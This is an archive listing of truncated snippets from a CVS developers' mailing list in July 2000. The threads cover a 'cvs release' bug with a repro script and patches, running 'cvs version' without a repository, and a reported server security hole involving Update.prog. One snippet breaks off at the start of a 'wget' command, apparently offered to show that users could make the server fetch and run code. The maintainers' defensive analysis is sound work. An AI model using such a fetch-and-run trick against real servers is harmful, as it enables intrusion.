Re: CVS release and status commands

2000-07-28 Thread Anton Lavrentiev
Hi, "KOIE Hidetaka ($B8q9>1QN4(B)" wrote: > > From: Anton Lavrentiev <[EMAIL PROTECTED]> > Subject: CVS release and status commands > Date: Fri, 28 Jul 2000 01:20:15 +0900 (JST) > > | It seems that there is a bug in the current CVS release, 1.10.8, which > | I have downloaded from www.cyc

Re: CVS release and status commands

2000-07-28 Thread Larry Jones
KOIE Hidetaka writes: > > I fail to repeat. The working directory is removed cleanly. The working directory is removed, but it is not removed from CVS/Entries in the parent directory (assuming the parent directory has a CVS/Entries file): * SCRIPT: foo #!/bin/sh DIR=`pwd`/repo [ -d $DIR ]

Re: cvs version w/o repository.

2000-07-28 Thread Larry Jones
KOIE Hidetaka writes: > > cvs version command may not access a repository. Why not? It doesn't seem like an unreasonable restriction to me. > "valid-requests" is used instead of "noop", > because "noop" command is not RQ_ROOTLESS. It would make more sense to change noop to be rootless. -Larr

RE: cvs version w/o repository.

2000-07-28 Thread $B8q9>1QN4(B
From: [EMAIL PROTECTED] (Larry Jones) Subject: Re: cvs version w/o repository. Date: Sat, 29 Jul 2000 00:18:32 +0900 (JST) | > cvs version command may not access a repository. | | Why not? It doesn't seem like an unreasonable restriction to me. Beause: `cvs version' displays it's ver

RE: CVS release and status commands

2000-07-28 Thread $B8q9>1QN4(B
I'v understood. This is a quick fix: *** release.c.org Sat Jul 29 02:49:45 2000 --- release.c Sat Jul 29 02:49:45 2000 *** release (argc, argv) *** 268,273 --- 268,275 if (unlink_file_dir (thisarg) < 0) error (0, errno, "deletion of di

RE: cvs version w/o repository.

2000-07-28 Thread Cameron, Steve
> From: [EMAIL PROTECTED] (Larry Jones) > Subject: Re: cvs version w/o repository. > Date: Sat, 29 Jul 2000 00:18:32 +0900 (JST) > > | > cvs version command may not access a repository. > | > | Why not? It doesn't seem like an unreasonable restriction to me. [smc] Wasn't "cvs

RE: cvs version w/o repository.

2000-07-28 Thread Cameron, Steve
I wrote: [...] > To see what version of CVS you're running locally, use "cvs -V" [smc] I meant "cvs -v"

Re: CVS release and status commands

2000-07-28 Thread Larry Jones
KOIE Hidetaka writes: > > I'v understood. This is a quick fix: Too quick. It doesn't work if thisarg is a path rather than just a simple name, and it doesn't work client/server (it only does the deregister on the server). This is my quick fix which is similar but avoids the first problem. (L

Re: cvs version w/o repository.

2000-07-28 Thread Larry Jones
Cameron, Steve writes: > > [smc] Wasn't "cvs version" recently introduced precisely so that > you could > see what version of CVS the _remote_ repository was running? Yes, Hide-san's point was that you shouldn't have to specify a valid root directory on the server just to find out wh

[akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
This looks like a serious security problem. It appears to open anonymous CVS servers to a wide range of attack. Ian --- Start of forwarded message --- To: [EMAIL PROTECTED] Date: Fri, 28 Jul 2000 17:21:28 +0900 From: Tanaka Akira <[EMAIL PROTECTED]> Subject: cvs security pr

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Karl Fogel
Ian Lance Taylor <[EMAIL PROTECTED]> writes: > This looks like a serious security problem. It appears to open > anonymous CVS servers to a wide range of attack. It looks serious, but not for anonymous-only servers, since anonymous users can't commit. The hole here, I think, is that someone who

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Larry Jones
Ian Lance Taylor writes: > > This looks like a serious security problem. It appears to open > anonymous CVS servers to a wide range of attack. It's a known problem. Like it says in the Cederqvist manual (under "Security considerations with password authentication"): ... once a user ha

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
From: Karl Fogel <[EMAIL PROTECTED]> Date: 28 Jul 2000 14:01:23 -0500 Ian Lance Taylor <[EMAIL PROTECTED]> writes: > This looks like a serious security problem. It appears to open > anonymous CVS servers to a wide range of attack. It looks serious, but not for anonymous-only s

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Karl Fogel
Sorry -- good point. I'll look at it in detail when I'm looking at it in detail, which will be early next week. In the meantime, I'll keep my mouth shut. :-) -K Ian Lance Taylor <[EMAIL PROTECTED]> writes: >From: Karl Fogel <[EMAIL PROTECTED]> >Date: 28 Jul 2000 14:01:23 -0500 > >

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Pavel Roskin
Hello! On 28 Jul 2000, Karl Fogel wrote: > Sorry -- good point. I'll look at it in detail when I'm looking at it > in detail, which will be early next week. In the meantime, I'll keep > my mouth shut. :-) I hope that there is no immediate danger. Look at serve_update_prog() - it checks whethe

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Larry Jones
Ian Lance Taylor writes: > > What if I frob Update.prog? I don't claim to understand all the cases > here, but it appears that that will be run by `cvs update'. Update.prog just contains the name of the program to run, not the actual code. If you can't commit, you can't upload arbitrary code t

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
Date: Fri, 28 Jul 2000 17:45:13 -0400 (EDT) From: [EMAIL PROTECTED] (Larry Jones) Ian Lance Taylor writes: > What if I frob Update.prog? I don't claim to understand all the cases > here, but it appears that that will be run by `cvs update'. Update.prog just contains the name

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT) From: Pavel Roskin <[EMAIL PROTECTED]> I hope that there is no immediate danger. Look at serve_update_prog() - it checks whether commits are allowed and exits if they are not. It prints a strange message though: E Flag -u in modules n

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
Date: 28 Jul 2000 14:58:08 -0700 From: Ian Lance Taylor <[EMAIL PROTECTED]> Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT) From: Pavel Roskin <[EMAIL PROTECTED]> I hope that there is no immediate danger. Look at serve_update_prog() - it checks whether commits are allow

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Pavel Roskin
> Update.prog just contains the name of the program to run, not the actual > code. If you can't commit, you can't upload arbitrary code to run, you > can only run pre-existing code on the server, and you have no control > over its input or arguments, so it's a very low-level threat. cat "wget ft

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Mike Castle
On Fri, Jul 28, 2000 at 05:20:13PM -0400, Larry Jones wrote: >-- the simplest fix would > be to just get rid of checkin and update programs, but I'm not sure how > people would feel about that. It would probably remove any chance I have of getting t